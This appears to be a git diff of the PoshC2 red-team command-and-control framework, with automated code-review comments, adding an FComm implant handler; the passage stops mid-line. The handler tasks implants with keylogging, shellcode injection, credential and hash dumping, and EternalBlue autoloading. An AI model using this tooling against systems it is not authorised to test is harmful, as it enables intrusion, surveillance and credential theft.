diff --git a/.gitignore b/.gitignore index fa95d406..c8651ad6 100644 --- a/.gitignore +++ b/.gitignore @@ -93,3 +93,6 @@ ENV/ # VSCode .vscode/ + +# VStudio +.vs/ diff --git a/poshc2/Colours.py b/poshc2/Colours.py index 6738e321..443a4e10 100644 --- a/poshc2/Colours.py +++ b/poshc2/Colours.py @@ -4,3 +4,4 @@ class Colours: RED = '\033[91m' END = '\033[0m' YELLOW = '\033[93m' + PURPLE = '\033[1;35m' diff --git a/poshc2/client/Help.py b/poshc2/client/Help.py index de6bcbce..5bdda4c5 100644 --- a/poshc2/client/Help.py +++ b/poshc2/client/Help.py @@ -221,6 +221,8 @@ sharpsc SERVER01 service "cmd /c rundll32.exe test.dll,Ep" domain username password pbind-connect hostname pbind-connect hostname +fcomm-connect +fcomm-connect filepath * Lateral Movement with Pre-Built Payload: =========================================== diff --git a/poshc2/client/command_handlers/FCommHandler.py b/poshc2/client/command_handlers/FCommHandler.py new file mode 100644 index 00000000..1e2d495b --- /dev/null +++ b/poshc2/client/command_handlers/FCommHandler.py 
@@ -0,0 +1,262 @@ +import base64, re, traceback, os, string, sys +from prompt_toolkit import PromptSession +from prompt_toolkit.history import FileHistory +from prompt_toolkit.auto_suggest import AutoSuggestFromHistory +from prompt_toolkit.styles import Style + +from poshc2.client.Alias import cs_alias, cs_replace +from poshc2.Colours import Colours +from poshc2.Utils import validate_sleep_time, argp, load_file, gen_key +from poshc2.server.AutoLoads import check_module_loaded, run_autoloads_sharp +from poshc2.client.Help import sharp_help +from poshc2.server.Config import PoshInstallDirectory, PoshProjectDirectory, SocksHost, PayloadsDirectory +from poshc2.server.Core import print_bad +from poshc2.client.cli.CommandPromptCompleter import FilePathCompleter +from poshc2.server.PowerStatus import getpowerstatus +from poshc2.server.database.DB import new_task, unhide_implant, kill_implant, get_implantdetails, get_sharpurls +from poshc2.server.database.DB import select_item, new_c2_message, get_powerstatusbyrandomuri, update_label, get_randomuri + + +def handle_fcomm_command(command, user, randomuri, implant_id): + + # convert randomuri to parent randomuri + oldrandomuri = randomuri + p = get_implantdetails(randomuri) + newimplant_id = re.search(r'(?<=\s)\S*', p.Label).group() + if newimplant_id is not None: + randomuri = get_randomuri(newimplant_id) + + # alias mapping + for alias in cs_alias: + if alias[0] == command[:len(command.rstrip())]: + command = alias[1] + + # alias replace + for alias in cs_replace: + if command.startswith(alias[0]): + command = command.replace(alias[0], alias[1]) + + original_command = command + command = command.strip() + + run_autoloads_sharp(command, randomuri, user, loadmodule_command="fcomm-loadmodule") + + if command.startswith("searchhistory"): + searchterm = (command).replace("searchhistory ", "") + with open('%s/.implant-history' % PoshProjectDirectory) as hisfile: + for line in hisfile: + if searchterm in line.lower(): + 
print(Colours.PURPLE + line.replace("+", "")) + + elif command.startswith("searchhelp"): + searchterm = (command).replace("searchhelp ", "") + helpful = sharp_help.split('\n') + for line in helpful: + if searchterm in line.lower(): + print(Colours.PURPLE + line) + + elif command.startswith("upload-file"): + source = "" + destination = "" + if command == "upload-file": + style = Style.from_dict({ + '': '#772953', + }) + session = PromptSession(history=FileHistory('%s/.upload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) + try: + source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*")) + source = PayloadsDirectory + source + except KeyboardInterrupt: + return + while not os.path.isfile(source): + print("File does not exist: %s" % source) + source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*")) + source = PayloadsDirectory + source + destination = session.prompt("Location to upload to: ") + else: + args = argp(command) + source = args.source + destination = args.destination + try: + destination = destination.replace("\\", "\\\\") + print("") + print("Uploading %s to %s" % (source, destination)) + uploadcommand = f"upload-file {source} {destination}" + new_task(f"fcomm-command {uploadcommand}", user, randomuri) + except Exception as e: + print_bad("Error with source file: %s" % e) + traceback.print_exc() + + elif command.startswith("unhide-implant"): + unhide_implant(oldrandomuri) + + elif command.startswith("hide-implant"): + kill_implant(oldrandomuri) + + elif command.startswith("inject-shellcode"): + params = re.compile("inject-shellcode", re.IGNORECASE) + params = params.sub("", command) + style = Style.from_dict({ + '': '#772953', + }) + session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) + try: + path = 
session.prompt("Location of shellcode file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bin")) + path = PayloadsDirectory + path + except KeyboardInterrupt: + return + try: + shellcodefile = load_file(path) + if shellcodefile is not None: + new_task("fcomm-command run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri) + except Exception as e: + print("Error loading file: %s" % e) + + elif command.startswith("migrate"): + params = re.compile("migrate", re.IGNORECASE) + params = params.sub("", command) + migrate(randomuri, user, params) + + elif command == "kill-implant" or command == "exit": + impid = get_implantdetails(randomuri) + ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid.ImplantID) + if ri.lower() == "n": + print("Implant not terminated") + if ri == "" or ri.lower() == "y": + new_task("fcomm-kill", user, randomuri) + kill_implant(oldrandomuri) + + elif command == "sharpsocks": + from random import choice + allchar = string.ascii_letters + channel = "".join(choice(allchar) for x in range(25)) + sharpkey = gen_key().decode("utf-8") + sharpurls = get_sharpurls() + sharpurls = sharpurls.split(",") + sharpurl = select_item("HostnameIP", "C2Server") + print(PoshInstallDirectory + "SharpSocks/SharpSocksServerCore -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.PURPLE) + ri = input("Are you ready to start the SharpSocks in the implant? 
(Y/n) ") + if ri.lower() == "n": + print("") + if ri == "": + new_task("fcomm-command run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 2000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", "")), user, randomuri) + if ri.lower() == "y": + new_task("fcomm-command run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 2000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", "")), user, randomuri) + + elif (command.startswith("stop-keystrokes")): + new_task("fcomm-command run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri) + update_label("", randomuri) + + elif (command.startswith("start-keystrokes")): + check_module_loaded("Logger.exe", randomuri, user) + new_task("fcomm-command run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri) + update_label("KEYLOG", randomuri) + + elif (command.startswith("get-keystrokes")): + new_task("fcomm-command run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri) + + elif (command.startswith("get-screenshotmulti")): + pwrStatus = get_powerstatusbyrandomuri(randomuri) + if (pwrStatus is not None and pwrStatus[7]): + ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ") + if ri.lower() == "n" or ri.lower() == "": + return + new_task(f"fcomm-command {command}", user, randomuri) + update_label("SCREENSHOT", randomuri) + + elif (command.startswith("get-screenshot")): + pwrStatus = get_powerstatusbyrandomuri(randomuri) + if (pwrStatus is not None and pwrStatus[7]): + ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? 
(y/N) ") + if ri.lower() == "n" or ri.lower() == "": + return + new_task(f"fcomm-command {command}", user, randomuri) + + elif (command == "get-powerstatus"): + getpowerstatus(randomuri) + new_task("fcomm-command run-dll PwrStatusTracker.PwrFrm PwrStatusTracker GetPowerStatusResult ", user, randomuri) + + elif (command == "getpowerstatus"): + getpowerstatus(randomuri) + new_task("fcomm-command run-dll PwrStatusTracker.PwrFrm PwrStatusTracker GetPowerStatusResult ", user, randomuri) + + elif (command.startswith("stop-powerstatus")): + new_task(f"fcomm-command {command}", user, randomuri) + update_label("", randomuri) + + elif (command.startswith("stoppowerstatus")): + new_task(f"fcomm-command {command}", user, randomuri) + update_label("", randomuri) + + elif (command.startswith("pslo")): + new_task(f"fcomm-{command}", user, randomuri) + + elif (command.startswith("run-exe SharpWMI.Program")) and "execute" in command and "payload" not in command: + style = Style.from_dict({'': '#772953'}) + session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) + try: + path = session.prompt("Location of base64 vbs/js file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.b64")) + path = PayloadsDirectory + path + except KeyboardInterrupt: + return + if os.path.isfile(path): + with open(path, "r") as p: + payload = p.read() + new_task("fcomm-command %s payload=%s" % (command, payload), user, randomuri) + else: + print_bad("Could not find file") + + elif (command.startswith("get-hash")): + check_module_loaded("InternalMonologue.exe", randomuri, user) + new_task("fcomm-command run-exe InternalMonologue.Program InternalMonologue", user, randomuri) + + elif (command.startswith("safetykatz")): + new_task("fcomm-command run-exe SafetyKatz.Program %s" % command, user, randomuri) + + elif command.startswith("loadmoduleforce"): + params = re.compile("loadmoduleforce ", re.IGNORECASE) + params = 
params.sub("", command) + new_task("fcomm-loadmodule %s" % params, user, randomuri) + + elif command.startswith("loadmodule"): + params = re.compile("loadmodule ", re.IGNORECASE) + params = params.sub("", command) + new_task("fcomm-loadmodule %s" % params, user, randomuri) + + elif command.startswith("listmodules"): + modules = os.listdir("%s/Modules/" % PoshInstallDirectory) + modules = sorted(modules, key=lambda s: s.lower()) + print("") + print("[+] Available modules:") + print("") + for mod in modules: + if (".exe" in mod) or (".dll" in mod): + print(mod) + + elif command.startswith("modulesloaded"): + ml = get_implantdetails(randomuri) + print(ml.ModsLoaded) + new_task("fcomm-command listmodules", user, randomuri) + + elif command == "help" or command == "?": + print(sharp_help) + + elif command.startswith("beacon") or command.startswith("set-beacon") or command.startswith("setbeacon"): + new_sleep = command.replace('set-beacon ', '') + new_sleep = new_sleep.replace('setbeacon ', '') + new_sleep = new_sleep.replace('beacon ', '').strip() + if not validate_sleep_time(new_sleep): + print(Colours.RED) + print("Invalid sleep command, please specify a time such as 50s, 10m or 1h") + print(Colours.PURPLE) + else: + new_task(f"fcomm-command {command}", user, randomuri) + + else: + if command: + new_task(f"fcomm-command {original_command}", user, randomuri) + return + + +def migrate(randomuri, user, params=""): + print("Do not use migrate when in a fcomm implant - use Inject-Shellcode") diff --git a/poshc2/client/command_handlers/ImplantHandler.py b/poshc2/client/command_handlers/ImplantHandler.py index 193542fa..f4aa0cda 100644 --- a/poshc2/client/command_handlers/ImplantHandler.py +++ b/poshc2/client/command_handlers/ImplantHandler.py 
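Review bot: The `start-keystrokes` and `get-hash` branches call `check_module_loaded("Logger.exe", randomuri, user)` and `check_module_loaded("InternalMonologue.exe", randomuri, user)` without `loadmodule_command="fcomm-loadmodule"`, so the default `loadmodule` task goes to the parent implant (`randomuri` is rewritten to the parent at the top of `handle_fcomm_command`) while the following `fcomm-command run-exe ...` executes in the FComm child, where the module was never loaded. Both calls should pass `loadmodule_command="fcomm-loadmodule"`, as the `run_autoloads_sharp` call a few lines above already does. Separately, `re.search(r'(?<=\s)\S*', p.Label).group()` raises AttributeError when the label contains no whitespace, so the `if newimplant_id is not None` guard can never fire; write `m = re.search(r'(?<=\s)\S*', p.Label)` followed by `if m: randomuri = get_randomuri(m.group())`. The `sharpsocks` channel name is also drawn with `random.choice`; `secrets.choice` is the appropriate source for a value that identifies a live proxy session.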
@@ -10,7 +10,7 @@ from poshc2.client.Help import SERVER_COMMANDS, PY_COMMANDS, SHARP_COMMANDS, POSH_COMMANDS, server_help from poshc2.Colours import Colours from poshc2.server.Config import PayloadsDirectory, PoshProjectDirectory, ReportsDirectory, ModulesDirectory, Database, DatabaseType -from poshc2.server.Config import PBindPipeName, PBindSecret, PayloadCommsHost, DomainFrontHeader +from poshc2.server.Config import PBindPipeName, PBindSecret, PayloadCommsHost, DomainFrontHeader, FCommFileName from poshc2.server.Core import get_creds_from_params, print_good, print_bad, number_of_days from poshc2.client.reporting.HTML import generate_html_table, graphviz from poshc2.client.reporting.CSV import generate_csv @@ -21,6 +21,7 @@ from poshc2.client.command_handlers.PSHandler import handle_ps_command from poshc2.client.command_handlers.PbindHandler import handle_pbind_command from poshc2.client.command_handlers.PbindPivotHandler import handle_pbind_pivot_command +from poshc2.client.command_handlers.FCommHandler import handle_fcomm_command from poshc2.client.cli.CommandPromptCompleter import FirstWordFuzzyWordCompleter from poshc2.client.Help import banner from poshc2.server.database.DBType import DBType @@ -54,6 +55,8 @@ def get_implant_type_prompt_prefix(implant_id): pivot = pivot + ";P" if "PBind" in pivot_original: pivot = pivot + ";PB" + if "FComm" in pivot_original: + pivot = pivot + ";FC" return pivot 
@@ -145,6 +148,8 @@ def implant_handler_command_loop(user, printhelp="", autohide=None): if "C#;PB" in Pivot: print(Colours.BLUE + "%s: Seen:%s | PID:%s | %s | PBind | %s\\%s @ %s (%s) %s %s" % (sID.ljust(4), LastSeenTimeString, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot, sLabel)) + elif "C#;FC" in Pivot: + print(Colours.PURPLE + "%s: Seen:%s | PID:%s | %s | FComm | %s\\%s @ %s (%s) %s %s" % (sID.ljust(4), LastSeenTimeString, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot, sLabel)) elif nowMinus30Beacons > LastSeenTime and autohide: pass elif nowMinus10Beacons > LastSeenTime: @@ -345,6 +350,9 @@ def run_implant_command(command, randomuri, implant_id, user): elif implant_type.startswith("C# PBind"): handle_pbind_command(command, user, randomuri, implant_id) return + elif implant_type.startswith("C# FComm"): + handle_fcomm_command(command, user, randomuri, implant_id) + return elif implant_type.startswith("C#"): handle_sharp_command(command, user, randomuri, implant_id) return @@ -387,6 +395,13 @@ def implant_command_loop(implant_id, user): session = PromptSession(history=FileHistory('%s/.implant-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) prompt_commands = SHARP_COMMANDS print(Colours.BLUE) + if 'FC' in implant.Pivot: + style = Style.from_dict({ + '': '#772953', + }) + session = PromptSession(history=FileHistory('%s/.implant-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) + prompt_commands = SHARP_COMMANDS + print(Colours.PURPLE) else: print(Colours.GREEN) print("%s\\%s @ %s (PID:%s)" % (implant.Domain, implant.User, implant.Hostname, implant.PID)) 
@@ -610,9 +625,9 @@ def do_show_hosted_files(user, command): def do_add_hosted_file(user, command): - FilePath = input("File Path: .e.g. /tmp/application.docx: ") - URI = input("URI Path: .e.g. /downloads/2020/application: ") - ContentType = input("Content Type: .e.g. (text/html): ") + FilePath = input("File Path (e.g. /tmp/application.docx): ") + URI = input("URI Path (e.g. /downloads/2020/application): ") + ContentType = input("Content Type (e.g. text/html): ") if ContentType == "": ContentType = "text/html" Base64 = no_yes_prompt("Base64 Encode File") @@ -961,6 +976,7 @@ def do_createdaisypayload(user, command): proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" pbindsecret = PBindSecret pbindpipename = PBindPipeName + fcomm_filename = FCommFileName daisyurl, daisyurl_count = string_to_array(daisyurl) daisyhostheader = "" @@ -977,7 +993,7 @@ def do_createdaisypayload(user, command): C2 = get_c2server_all() urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "") newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, - "%s?d" % get_newimplanturl(), PayloadsDirectory, PowerShellProxyCommand=proxynone, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret) + "%s?d" % get_newimplanturl(), PayloadsDirectory, PowerShellProxyCommand=proxynone, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret, FCommFileName=fcomm_filename) newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (daisyurl), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain)) newPayload.CreateDroppers("%s_" % name) newPayload.CreateShellcode("%s_" % name) 
@@ -1005,12 +1021,13 @@ def do_createnewpayload(user, command, creds=None, shellcodeOnly=False): input("Press Enter to continue...") clear() return - name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ") - comms_url = input("Domain or URL in array format: https://www.example.com,https://www.example2.com ") - domainfront = input("Domain front URL in array format: fjdsklfjdskl.cloudfront.net,jobs.azureedge.net ") - proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ") - pbindsecret = input(f"PBind Secret: e.g {PBindSecret} ") - pbindpipename = input(f"PBind Pipe Name: e.g. {PBindPipeName} ") + name = input(Colours.GREEN + "Proxy Payload Name (e.g. Scenario_One): ") + comms_url = input("Domain or URL in array format (e.g. https://www.example.com,https://www.example2.com): ") + domainfront = input("Domain front URL in array format (e.g. fjdsklfjdskl.cloudfront.net,jobs.azureedge.net): ") + proxyurl = input("Proxy URL (e.g. http://10.150.10.1:8080): ") + pbindsecret = input(f"PBind Secret (e.g {PBindSecret}): ") + pbindpipename = input(f"PBind Pipe Name (e.g. {PBindPipeName}): ") + fcomm_filename = input(f"FComm File Name (e.g. {FCommFileName}): ") if not pbindsecret: pbindsecret = PBindSecret @@ -1018,6 +1035,9 @@ def do_createnewpayload(user, command, creds=None, shellcodeOnly=False): if not pbindpipename: pbindpipename = PBindPipeName + if not fcomm_filename: + fcomm_filename = FCommFileName + comms_url, PayloadCommsHostCount = string_to_array(comms_url) domainfront, DomainFrontHeaderCount = string_to_array(domainfront) if PayloadCommsHostCount == DomainFrontHeaderCount: 
@@ -1035,16 +1055,16 @@ def do_createnewpayload(user, command, creds=None, shellcodeOnly=False): proxyuser = "%s\\%s" % (creds['Domain'], creds['Username']) proxypass = creds['Password'] else: - proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ") - proxypass = input("Proxy Password: e.g. Password1 ") - credsexpire = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018 ") + proxyuser = input(Colours.GREEN + "Proxy User (e.g. Domain\\user): ") + proxypass = input("Proxy Password (e.g. Password1): ") + credsexpire = input(Colours.GREEN + "Password/Account Expiration Date (e.g. 15/03/2018): ") imurl = "%s?p" % get_newimplanturl() else: imurl = get_newimplanturl() C2 = get_c2server_all() urlId = new_urldetails(name, comms_url, domainfront, proxyurl, proxyuser, proxypass, credsexpire) - newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, imurl, PayloadsDirectory, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret) + newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, imurl, PayloadsDirectory, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret, FCommFileName=fcomm_filename) if shellcodeOnly: newPayload.CreateDroppers("%s_" % name) @@ -1081,6 +1101,8 @@ def do_label_implant(user, command, randomuri): implant_type = get_implanttype(randomuri) if "PB" in implant_type: print("Cannot re-label a PBind implant at this time") + elif "FC" in implant_type: + print("Cannot re-label an FComm implant at this time") else: update_label(label, randomuri) diff --git a/poshc2/client/command_handlers/PbindHandler.py b/poshc2/client/command_handlers/PbindHandler.py index 6082257f..5ffe55f2 100644 --- a/poshc2/client/command_handlers/PbindHandler.py +++ b/poshc2/client/command_handlers/PbindHandler.py 
@@ -39,28 +39,28 @@ def handle_pbind_command(command, user, randomuri, implant_id): original_command = command command = command.strip() - run_autoloads_sharp(command, randomuri, user, isPBind=True, isPBindPivot=False, pbind_randomuri=oldrandomuri) + run_autoloads_sharp(command, randomuri, user, loadmodule_command="pbind-loadmodule") if command.startswith("searchhistory"): searchterm = (command).replace("searchhistory ", "") with open('%s/.implant-history' % PoshProjectDirectory) as hisfile: for line in hisfile: if searchterm in line.lower(): - print(Colours.GREEN + line.replace("+","")) + print(Colours.BLUE + line.replace("+", "")) elif command.startswith("searchhelp"): searchterm = (command).replace("searchhelp ", "") helpful = sharp_help.split('\n') for line in helpful: if searchterm in line.lower(): - print(Colours.GREEN + line) + print(Colours.BLUE + line) elif command.startswith("upload-file"): source = "" destination = "" if command == "upload-file": style = Style.from_dict({ - '': '#80d130', + '': '#008ECC', }) session = PromptSession(history=FileHistory('%s/.upload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) try: @@ -97,7 +97,7 @@ def handle_pbind_command(command, user, randomuri, implant_id): params = re.compile("inject-shellcode", re.IGNORECASE) params = params.sub("", command) style = Style.from_dict({ - '': '#80d130', + '': '#008ECC', }) session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) try: 
@@ -195,7 +195,7 @@ def handle_pbind_command(command, user, randomuri, implant_id): new_task(f"pbind-{command}", user, randomuri) elif (command.startswith("run-exe SharpWMI.Program")) and "execute" in command and "payload" not in command: - style = Style.from_dict({'': '#80d130'}) + style = Style.from_dict({'': '#008ECC'}) session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) try: path = session.prompt("Location of base64 vbs/js file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.b64")) @@ -205,7 +205,7 @@ def handle_pbind_command(command, user, randomuri, implant_id): if os.path.isfile(path): with open(path, "r") as p: payload = p.read() - new_task("pbind-command %s payload=%s" % (command,payload), user, randomuri) + new_task("pbind-command %s payload=%s" % (command, payload), user, randomuri) else: print_bad("Could not find file") @@ -254,7 +254,7 @@ def handle_pbind_command(command, user, randomuri, implant_id): if not validate_sleep_time(new_sleep): print(Colours.RED) print("Invalid sleep command, please specify a time such as 50s, 10m or 1h") - print(Colours.GREEN) + print(Colours.BLUE) else: new_task(f"pbind-command {command}", user, randomuri) @@ -284,4 +284,4 @@ def do_pbind_start(user, command, randomuri): new_task(command, user, randomuri) def migrate(randomuri, user, params=""): - print("Do not use migrate when in a pbind implant - use Inject-Shellcode") \ No newline at end of file + print("Do not use migrate when in a pbind implant - use Inject-Shellcode") diff --git a/poshc2/client/command_handlers/PbindPivotHandler.py b/poshc2/client/command_handlers/PbindPivotHandler.py index 5acbb2ea..814e5eed 100644 --- a/poshc2/client/command_handlers/PbindPivotHandler.py +++ b/poshc2/client/command_handlers/PbindPivotHandler.py 
@@ -38,8 +38,8 @@ def handle_pbind_pivot_command(command, user, randomuri, implant_id): original_command = command command = command.strip() - - run_autoloads_sharp(command, randomuri, user, isPBind=False, isPBindPivot=True, pbind_randomuri=oldrandomuri) + + run_autoloads_sharp(command, randomuri, user, loadmodule_command="pbind-pivot-loadmodule") if command.startswith("searchhistory"): searchterm = (command).replace("searchhistory ", "") diff --git a/poshc2/client/command_handlers/SharpHandler.py b/poshc2/client/command_handlers/SharpHandler.py index 3ed9bf15..731faa13 100644 --- a/poshc2/client/command_handlers/SharpHandler.py +++ b/poshc2/client/command_handlers/SharpHandler.py @@ -9,7 +9,7 @@ from poshc2.server.AutoLoads import check_module_loaded, run_autoloads_sharp from poshc2.client.Help import sharp_help from poshc2.server.Config import PoshInstallDirectory, PoshProjectDirectory, SocksHost, PayloadsDirectory, ModulesDirectory -from poshc2.server.Config import PayloadCommsHost, DomainFrontHeader, UserAgent, PBindPipeName, PBindSecret +from poshc2.server.Config import PayloadCommsHost, DomainFrontHeader, UserAgent, PBindPipeName, PBindSecret, FCommFileName from poshc2.Utils import argp, load_file, gen_key, get_first_url, get_first_dfheader from poshc2.server.Core import print_bad, print_good from poshc2.client.cli.CommandPromptCompleter import FilePathCompleter @@ -105,6 +105,9 @@ def handle_sharp_command(command, user, randomuri, implant_id): elif command.startswith("pbind-connect"): do_pbind_start(user, command, randomuri) return + elif command.startswith("fcomm-connect"): + do_fcomm_start(user, command, randomuri) + return elif command.startswith("dynamic-code"): do_dynamic_code(user, command, randomuri) return 
@@ -383,6 +386,18 @@ def do_pbind_start(user, command, randomuri): new_task(command, user, randomuri) +def do_fcomm_start(user, command, randomuri): + key = get_baseenckey() + if len(command.split()) == 1: # 'fcomm-connect' is one args + command = f"{command} {FCommFileName} {key}" + elif len(command.split()) == 2: # if the file name is already there then just add the key + command = f"{command} {key}" + else: + print_bad("Expected 'fcomm_connect' or 'fcomm_connect '") + return + new_task(command, user, randomuri) + + def do_dynamic_code(user, command, randomuri): compile_command = "mono-csc %sDynamicCode.cs -out:%sPoshC2DynamicCode.exe -target:exe -warn:2 -sdk:4" % (PayloadsDirectory, PayloadsDirectory) try: diff --git a/poshc2/server/AutoLoads.py b/poshc2/server/AutoLoads.py index a3ab50e7..3c5ba0e1 100644 --- a/poshc2/server/AutoLoads.py +++ b/poshc2/server/AutoLoads.py @@ -4,25 +4,16 @@ from poshc2.server.database.DB import update_mods, new_task, select_mods -def check_module_loaded(module_name, randomuri, user, force=False, isPBind=False, isPBindPivot=False, pbind_randomuri=None): - if isPBind: - loadmodule_command = "pbind-loadmodule" - implant_randomuri = pbind_randomuri - elif isPBindPivot: - loadmodule_command = "pbind-pivot-loadmodule" - implant_randomuri = pbind_randomuri - else: - loadmodule_command = "loadmodule" - implant_randomuri = randomuri +def check_module_loaded(module_name, randomuri, user, force=False, loadmodule_command="loadmodule"): try: - modules_loaded = select_mods(implant_randomuri) + modules_loaded = select_mods(randomuri) if force: for modname in os.listdir(ModulesDirectory): if modname.lower() == module_name.lower(): module_name = modname new_task(f"{loadmodule_command} {module_name}", user, randomuri) - update_mods(module_name, implant_randomuri) + update_mods(module_name, randomuri) if modules_loaded: new_modules_loaded = "%s %s" % (modules_loaded, module_name) if module_name not in modules_loaded: 
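Review bot: `do_fcomm_start` decides the argument shape with `len(command.split())`, so any FComm file path containing a space (e.g. under `C:\Program Files`) falls into the `else` branch and is rejected, and the rejection text names `fcomm_connect` with underscores and an empty second placeholder although the command is `fcomm-connect`. Splitting at most once, `parts = command.split(None, 1)`, keeps a spaced path intact, and the message should read `print_bad("Expected 'fcomm-connect' or 'fcomm-connect <filepath>'")`. `get_baseenckey` is not among the imports touched in this file's import hunk; presumably it is already in scope elsewhere in the module, but that should be confirmed since the function would otherwise fail only at runtime when the operator issues the command.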
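Review bot: `check_module_loaded` now reads and updates the loaded-module list (`select_mods(randomuri)`, `update_mods(..., randomuri)`) with the same `randomuri` it queues the task to, which for the PBind/FComm handlers is the parent implant's URI (they rewrite `randomuri` to the parent before calling `run_autoloads_sharp`), whereas the removed code tracked the child separately via `pbind_randomuri`. The parent's `ModsLoaded` record is therefore shared by the parent and every child pivoted from it, and a module already loaded in the parent (or in one child) makes the `module_name not in modules_loaded` test skip the `pbind-loadmodule`/`fcomm-loadmodule` task for another implant that has not loaded it. Consider keeping a separate tracking URI, e.g. `def check_module_loaded(module_name, randomuri, user, force=False, loadmodule_command="loadmodule", mods_randomuri=None):` with `mods_randomuri = mods_randomuri or randomuri` used for the `select_mods`/`update_mods` calls, and have the pivot handlers pass their child URI as they did before. The body of `check_module_loaded` continues in the next hunk.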
@@ -30,328 +21,332 @@ def check_module_loaded(module_name, randomuri, user, force=False, isPBind=False if modname.lower() == module_name.lower(): module_name = modname new_task(f"{loadmodule_command} {module_name}", user, randomuri) - update_mods(new_modules_loaded, implant_randomuri) + update_mods(new_modules_loaded, randomuri) else: new_modules_loaded = "%s" % (module_name) new_task(f"{loadmodule_command} {module_name}", user, randomuri) - update_mods(new_modules_loaded, implant_randomuri) + update_mods(new_modules_loaded, randomuri) except Exception as e: print(f"Error: {loadmodule_command} {module_name}: {e}") -def run_autoloads(command, randomuri, user, isPBind=False, isPBindPivot=False): +def run_autoloads(command, randomuri, user, loadmodule_command="loadmodule"): command = command.lower().strip() if command.startswith("invoke-eternalblue"): - check_module_loaded("Exploit-EternalBlue.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Exploit-EternalBlue.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-screenshotallwindows"): - check_module_loaded("Get-ScreenshotAllWindows.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-ScreenshotAllWindows.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-psuacme"): - check_module_loaded("Invoke-PsUACme.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-PsUACme.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-bloodhound"): - check_module_loaded("SharpHound.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("SharpHound.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("brute-ad"): - check_module_loaded("Brute-AD.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + 
